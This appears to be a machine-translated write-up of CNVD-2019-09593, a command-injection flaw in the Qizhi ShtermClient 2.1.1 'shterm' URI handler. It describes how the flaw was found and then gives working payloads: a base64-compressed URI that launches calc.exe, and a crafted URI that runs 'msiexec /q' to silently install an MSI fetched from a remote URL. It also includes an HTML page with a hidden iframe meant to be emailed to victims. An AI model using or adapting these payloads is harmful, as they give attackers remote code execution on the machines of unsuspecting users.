First, the basic information
Reference: https: //www.cnvd.org.cn/flaw/show/1559039
Patch Information: fixes the vulnerability was released on April 1, 2019. If the customer has not yet fix the patch, you can contact technical support Qi treatment technology to get specific help.
Second, the vulnerability mining process
This is my first contact with the operation and maintenance fort machine, log on the target server / application through the fortress machine, just as open directly in local, I feel very magical.
1, the mining process
First, after the installation operation and maintenance treatment Qi fortress Client software ShtermClient, will register a pseudo-protocol "shterm" on your computer. It is through this agreement fortress machine, call the local program opens a channel to the fortress machine. The following figure is chrome browser to open the link when prompted.
We can find it in the registry, Command subkey specifies how to handle the URI shterm agreement.
By the process of packet capture analysis, we found that the "app": "mstsc" changed to "app": "calc", generated shterm URI to open a local calculator. Command injection app once thought only parameter, then use Procmon.exe monitoring LoadShell.exe execution, found to generate some log files in the% tmp% directory, log file analysis and multiple tests, was finally possible utilization scheme .
Client / inflate.php source code, the server only visible data submitted to compression, is performed after base64 encoded output.
2, verify vulnerability
If you use shtermclient vulnerable, open the following link in your browser will open a calculator calc.exe in this machine.
shterm://eJyrVkosKFCyUkpOzElWqgUAIf8Ejw==
Third, exploit
1, set up a test environment
Install on the drone ShtermClient-2.1.1.
Then, set up on the Kali PHP environment, so as to generate shterm URI, see below.
Open link in a drone browser, you can pop-up calculator.
2、Exploit
Below, submitted to the POST request, generated shterm URI will execute the command:
msiexec.exe /q /n /i https://github.com/Yasushi/putty/archive/master.msi
然后,把shterm URI放入iframe中,将该html页面的地址通过邮件或者你能想到的其他途径发给目标用户,即可达到不可告人的目的。
<html> <head> <meta charset="utf-8" /> <title>demo</title></head> <body> <h1>demo</h1> <h1>齐治堡垒机ShtermClient-2.1.1命令执行漏洞(CNVD-2019-09593)</h1> <br><h1>Hacked by StudyCat</h1> <iframe width="1" height="1" src="shterm://eJx1T8tqwzAQ/BWz5yC0tuu4uvWWQyAuDTm2yI9i48c6kt0klP57VzK4aaFCh5nZ2dndTygvoKBRGCUJbKCsPdsmKRNtmViVPsZxHByOGaonSbv96fwsB0RMIva8a+9BKeIHgSl/FUb8XPvss0KGtlhhPo7LQDfODoxf6qkyfWboentbc8KtK7tt/khuniGa7KzLvhms06bftuA1+CeTK/e9TK03ckhb3XLSpqyJ2mVBFnsamokMKLkBdjlZslwVKxx/oO7WI7U/stBdweSj4gAIBQoXOZvufltM4esbMSFnCg=="></iframe> </body> </html>